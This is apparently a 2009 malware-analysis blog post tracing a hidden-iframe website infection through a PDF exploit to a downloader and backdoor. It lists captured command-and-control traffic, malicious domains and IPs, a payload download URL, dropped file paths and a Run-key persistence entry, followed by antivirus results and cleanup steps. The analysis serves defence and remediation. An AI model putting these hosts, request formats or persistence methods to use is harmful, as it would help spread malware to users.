A user submitted a suspicious link that was present in his website as a hidden iframe. Malicious hidden iframes are mainly inserted into HTML pages of legitimate websites, by hackers that want to spread their malware with the objective of infecting all the users that visit the compromised website and in most of the cases, its possible that the hackers have infected every file of the website, or they have installed a malicious URL redirect to another website that hosts exploits for commonly used web browsers.

The website could be compromised by the hacker because:

- Your website contains scripts that are vulnerable to RFI/SQL/XSS/LFI/RCE/etc.

- Your website is hosted in a shared-host, and if an hacker has compromised one website hosted in the same cluster as yours, the hacker can infect ALL the websites present, yours included.

Now lets see what would happen if you had visited the infected website with the hidden malicious iframe. The malicious hidden iframe looks like:

After I browsed the malicious url I was redirected to another website that contains a PDF exploit:

Internet traffic:

1
2
3
4
5
6
7
8
9

GET /in.cgi?cocacola46 HTTP/1.1
Host: litetopfindworld.cn
HTTP/1.1 302 Found
 
GET /index.php?cocacola46 HTTP/1.1
Host: ghrgt.hostindianet.com
HTTP/1.1 200 OK
Server: nginx/0.6.35
Content-Length: 6147

From the exploit screenshot we can see that the exploit redirected my browser to:

cache/readme.pdf  => Another iframe redirect
cache/flash.swf     => Another iframe redirect

It created various files in Temporary Internet Files related to the malicious urls:

After the execution of the files downloaded from the exploit, new files were created in my system:

1
2
3
4
5

C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe

The file C:\Documents and Settings\user\user.exe had +H (Hidden) attribute and was hidden from explorer search. A DLL file named crypts.dll was injected in explorer.exe and the file named user.exe created a new registry key to be able to startup everytime Windows starts:

1

HKCU\...\Run\user.exe

During the analysis, the malware established various connections with different domains and IPs:

1
2
3
4
5
6

94.247.3.152 (hs.3-152.zlkon.lv)
213.155.4.82 (N/A)
78.109.30.224 (reverse30-224.reserver.ru)
94.247.2.95 (hs.2-95.zlkon.lv)
68.180.151.74 (hansali4.com)
83.133.127.5 (.)

Internet traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=xxx&rnd=xxx HTTP/1.1
Host: 213.155.4.82
 
POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Length: 16
guid=xxxxxx
 
GET /bt.php?mod=&id=xxx&up=xxx&mid=soboc42 HTTP/1.1
Host: af9f330a59.com
0SLP:3600;MOD:dAcbf6;URL:hxxp://hansali4.com/731l2.exe;SRV:stoped;
 
GET /731l2.exe HTTP/1.1
Host: hansali4.com
 
POST /gate/gate.php HTTP/1.0
Host: mixmediadirect.cn
 
194.8.74.51:443 => SSL Traffic

The malware also started to establish connections with hotmail.com, probably to spam messages to other emails or something similar:

1
2
3
4
5
6
7
8
9

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hotmail.com
Connection: Keep-Alive
 
HTTP/1.1 302 Redirected
Date: Sun, 29 Mar 2009 16:59:07 GMT
Server: Microsoft-IIS/6.0
Location: hxxp://lc1.bay0.hotmail.passport.com/cgi-bin/login

This is a report from the virus scanner:

Report Generated: 29.3.2009 at 19.57.41 (GMT 1)
File Name: index[1].htm
File Size: 6 KB
MD5 Hash: 2F9467513FAE3071B8EC831857963340
SHA1 Hash: 59C6D7D70F529762FAD7408360E016D6C816EFB3
Detection Rate: 2 on 24 (8,33 %)
Status: INFECTED

 

Antivirus Sig version Engine Version Result
a-squared 29/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.228 8.1.2.12 -
Avast 090328-0 4.8.1229 -
AVG 270.11.31/2028 8.0.0.0 -
BitDefender 29/03/2009 7.0.0.2555 -
ClamAV 29/03/2009 0.93.1.0 -
Comodo 1087 3.8 -
Dr.Web 29/03/2009 5.0 -
Ewido 29/03/2009 4.0.0.2 -
F-PROT 6 20090328 4.4.4.56 JS/Psyme.IX
G DATA 19.3655 2.0.7309.847 -
IkarusT3 27/03/2009 1001044 -
Kaspersky 29/03/2009 8.0.0.357 Trojan-Downloader.JS.Agent.duy
McAfee 29/03/2009 5.1.0.0 -
Malware Hash Registry 29/03/2009 N/A -
NOD32 v3 3972 3.0.677 -
Norman 2009/03/27 5.92.08 -
Panda 07/02/2009 9.5.1.00 -
QuickHeal 28 March, 2009 10.0 -
Solo Antivirus 29/03/2009 8.0 -
Sophos 29/03/2009 4.32.0 -
TrendMicro 927(592700) 1.1-1001 -
VBA32 29/03/2009 3.12.0.300 -
VirusBuster 10.102.26 1.4.3 -

Report Generated: 29.3.2009 at 19.56.42 (GMT 1)
File Name: 731l2[1].exe
File Size: 71 KB
MD5 Hash: 6E14662D9469DFC1E6387F9C5D00513A
SHA1 Hash: C0E8B584E105ACED2A4CE403EF77CB45B3987E45
Detection Rate: 17 on 24 (70,83 %)
Status: INFECTED

 

Antivirus Sig version Engine Version Result
a-squared 29/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.228 8.1.2.12 TR/Downloader.Gen
Avast 090328-0 4.8.1229 Win32:Trojan-gen {Other}
AVG 270.11.31/2028 8.0.0.0 Downloader.Generic8.ZVT
BitDefender 29/03/2009 7.0.0.2555 Trojan.Generic.1545891
ClamAV 29/03/2009 0.93.1.0 -
Comodo 1087 3.8 Backdoor.Win32.KeyStart.~A
Dr.Web 29/03/2009 5.0 Trojan.DownLoader.origin
Ewido 29/03/2009 4.0.0.2 -
F-PROT 6 20090328 4.4.4.56 -
G DATA 19.3655 2.0.7309.847 -
IkarusT3 27/03/2009 1001044 Backdoor.Win32.KeyStart
Kaspersky 29/03/2009 8.0.0.357 Backdoor.Win32.KeyStart.cb
McAfee 29/03/2009 5.1.0.0 Generic Downloader.x trojan
Malware Hash Registry 29/03/2009 N/A detect rate 74%
NOD32 v3 3972 3.0.677 Win32/TrojanDownloader.Agent.OWB
Norman 2009/03/27 5.92.08 Trojan W32/DLoader.KZPW
Panda 07/02/2009 9.5.1.00 -
QuickHeal 28 March, 2009 10.0 Backdoor.KeyStart.cb
Solo Antivirus 29/03/2009 8.0 Backdoor.Win32.KeyStart.CB
Sophos 29/03/2009 4.32.0 Sus/Spy-B
TrendMicro 927(592700) 1.1-1001 -
VBA32 29/03/2009 3.12.0.300 Backdoor.Win32.KeyStart.bz
VirusBuster 10.102.26 1.4.3 Backdoor.KeyStart.AD

What can I do if my website is infected ?

• Clean the infected HTML/PHP pages
• Change username and password to the FTP Account
• Change username and password to the Email Account
• Change username and password to the SSH
• Contact the server admin and explain your situation
• Check your PHP files for possible vulnerabilities
• Update all the installed software (blog, forum, etc)
• Remember to never make backups from the website to your PC
• Use always local backups for the website files

The first action that the system administrator needs to do is to remove the malicious hidden iframe code from all HTML pages, and then check the logs and code of installed PHP scripts to find the presence of possible vulnerable code. It is very important to change all the usernames and passwords for all the accounts present in the server.

How can I remove the malware infection from my computer ?

1] Delete all the created files, in my case:

1
2
3
4
5

C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe

2] Delete the malicious registry keys, in my case:

1

HKCU\...\Run\user.exe

3) Run a complete system scan with your Antivirus to detect other possible trojans installed in your computer.

4) Scan your system with NoVirusThanks Malware Remover.

Another very similar analysis to this:
Website with hidden iframe and Malware Analysis

Posted by admin on Sunday, March 29th, 2009 at 6:04 pm and filed under Malware Analysis with tags downloader, hidden iframe, malware, website infected. You can skip to the end and leave a response. Pinging is currently not allowed.